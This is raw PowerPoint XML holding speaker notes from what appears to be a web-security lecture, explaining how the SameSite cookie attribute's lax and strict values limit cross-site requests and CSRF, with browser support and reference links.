                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB557E6-D900-6E4A-A027-FACA895B15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7B962A-86F4-774A-864A-39650C4633DD}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>65</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C1AC9818-6732-A34E-BE76-0B108B2377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C379EF70-EF46-5A41-BD46-C17659980E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a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> prevents the browser from sending this cookie along with cross-site requests. The main goal is mitigate the risk of cross-origin information leakage. It also provides some protection against cross-site request forgery attacks. Possible values for the flag are lax or strict.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> receive the session cookie and the user will not be able to access the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>A bank website however most likely doesn't want to allow any transactional pages to be linked from external sites so the strict flag would be most appropriate here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The default lax value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods (e.g. POST).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>As of November 2017 the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> attribute is implemented in Chrome, Firefox, and Opera. Since version 12.1 Safari also supports this. Windows 7 with IE 11 lacks support as of December 2018, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>caniuse.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/SameSite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103428" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AD76E4-6E47-2245-A2AA-668D45A830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4E9C3C-397D-8942-9C91-B5DA61EB4C51}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>66</a:t>
            </a:fld>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46D32C8B-0113-E549-953D-D32A805F45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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139350D7-B6C7-6C41-84C4-AB783F6BF5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SameSite prevents the browser from sending this cookie along with cross-site requests. The main goal is mitigate the risk of cross-origin information leakage. It also provides some protection against cross-site request forgery attacks. Possible values for the flag are lax or strict.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> receive the session cookie and the user will not be able to access the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>A bank website however most likely doesn't want to allow any transactional pages to be linked from external sites so the strict flag would be most appropriate here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The default lax value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods (e.g. POST).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>As of November 2017 the SameSite attribute is implemented in Chrome, Firefox, and Opera. Since version 12.1 Safari also supports this. Windows 7 with IE 11 lacks support as of December 2018, see caniuse.com below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/SameSite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105476" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12886C94-95DC-B246-9C95-C1D774937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68B461-B1E5-354D-AD6D-5A416D9FC9D1}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>67</a:t>
            </a:fld>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705B463-D195-924A-9306-2D85C1FF78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A4EB89F0-676B-774A-A33E-A3AACC22C9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a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> prevents the browser from sending this cookie along with cross-site requests. The main goal is mitigate the risk of cross-origin information leakage. It also provides some protection against cross-site request forgery attacks. Possible values for the flag are lax or strict.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> receive the session cookie and the user will not be able to access the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>A bank website however most likely doesn't want to allow any transactional pages to be linked from external sites so the strict flag would be most appropriate here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The default lax value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, or anything causing GET) from an external website while blocking it in CSRF-prone request methods (e.g. POST, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>As of November 2017 the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> attribute is implemented in Chrome, Firefox, and Opera. Since version 12.1 Safari also supports this. Windows 7 with IE 11 lacks support as of December 2018, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>caniuse.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/SameSite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107524" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4C6FF9-092C-AE4C-AB84-42B32F7118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65A819-AF93-6E4F-8280-BB978EAC0B2B}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>68</a:t>
            </a:fld>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95994535-97D8-A14D-81B2-0170430A7B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76B3F188-4D2C-4941-93C4-65C212796C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important point here is that, to send a cookie with a GET request, GET request being made must cause a top level navigation. Only in this way, the cookie set as LAX will be sent. Let me explain more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Resources can be loaded by iframe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> tags, and script tags. These requests can also operate as GET requests, but none of them cause TOP LEVEL navigation. Basically, they don't change the URL in your address bar. Because these GET requests do not cause a TOP LEVEL navigation, thus cookies set to Lax won't be sent with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://web.dev/samesite-cookies-explained/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109572" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6AB5AC5-0011-D242-908E-3882C441C0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CA1B59-43FB-4742-85DF-C05B14FA1C4B}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>69</a:t>
            </a:fld>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09C9B122-568F-4342-9B55-ED7E499D80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D27605D6-7A4A-3D4F-B852-A08A147139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important point here is that, to send a cookie with a GET request, GET request being made must cause a top level navigation. Only in this way, the cookie set as LAX will be sent. Let me explain more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Resources can be loaded by iframe, img tags, and script tags. These requests can also operate as GET requests, but none of them cause TOP LEVEL navigation. Basically, they don't change the URL in your address bar. Because these GET requests do not cause a TOP LEVEL navigation, thus cookies set to Lax won't be sent with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://web.dev/samesite-cookies-explained/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111620" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C417E8-01ED-8940-A099-0341B5C938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09951A-503E-8C41-9E60-9B48C6601BED}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>70</a:t>
            </a:fld>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DEB2A61F-1C5A-BB46-9384-1AD203C6BB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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44EE5A4-65AE-364C-9041-3738289CC7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important point here is that, to send a cookie with a GET request, GET request being made must cause a top level navigation. Only in this way, the cookie set as LAX will be sent. Let me explain more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Resources can be loaded by iframe, img tags, and script tags. These requests can also operate as GET requests, but none of them cause TOP LEVEL navigation. Basically, they don't change the URL in your address bar. Because these GET requests do not cause a TOP LEVEL navigation, thus cookies set to Lax won't be sent with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://web.dev/samesite-cookies-explained/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113668" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C6E60D6-6354-9547-8547-40946D5A19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6F7085-737B-044B-B351-75B6299E490A}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>71</a:t>
            </a:fld>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F5D1AA39-871C-F341-842A-66D7F36A49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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6AE9AD-61CD-E64B-A039-BA8F5A72F3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important point here is that, to send a cookie with a GET request, GET request being made must cause a top level navigation. Only in this way, the cookie set as LAX will be sent. Let me explain more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Resources can be loaded by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> tags, and script tags. These requests can also operate as GET requests, but none of them cause TOP LEVEL navigation. Basically, they don't change the URL in your address bar. Because these GET requests do not cause a TOP LEVEL navigation, thus cookies set to Lax won't be sent with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>If the user clicks on a link then it does cause a top level navigation though, so that does send Lax cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>In Google Chrome’s latest all cookies are by default lax. So no cookies will be sent with POST, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, AJAX and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> cross-site requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://web.dev/samesite-cookies-explained/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115716" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DEDFAC4-E0DE-ED4A-A383-DD358CB5F5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F9BE99-ECC8-2E4F-9499-BDE690C7D799}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>72</a:t>
            </a:fld>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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C09A59-6514-1E41-BC47-20B1C27E1FDC}"/>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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14969A1D-ACD9-2A41-BC7B-0C53BC627AFD}"/>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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FFE19F-F5B2-B140-971E-769E1095DC25}"/>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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C227B52-B106-AC4C-9E0E-5C9204565AF0}"/>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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090EB9C6-ADDC-6C48-9551-D637AEDB2C53}"/>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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA3D9036-2120-8347-9616-DAC1D2AC2BAD}"/>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try to display this page in a browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{383291B6-5FE6-1A42-A459-F36199AF9227}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1634078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Notes Placeholder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E14B7B3-90F6-364B-AF50-B9DA0B76528E}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CCC7CC-BB5F-3145-B43C-1493E6CF6664}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670B4E8D-EFF4-854A-9FE9-47FCB80E2D2D}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C9D9D75-0859-4E4F-A2A6-637B46DA673C}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CAF577F-4D44-DB43-A6CE-72252110E70F}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEEAA172-132B-F144-9808-A40BF67E502B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2147483648" y="-2147483648"/>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value pairs; e.g. edition is the key and us is the value. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The domain means this cookie is only accessible to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zdnet.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and its subdomains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{383291B6-5FE6-1A42-A459-F36199AF9227}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2781959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276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="4352544"/>
            <a:ext cx="7040880" cy="423193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
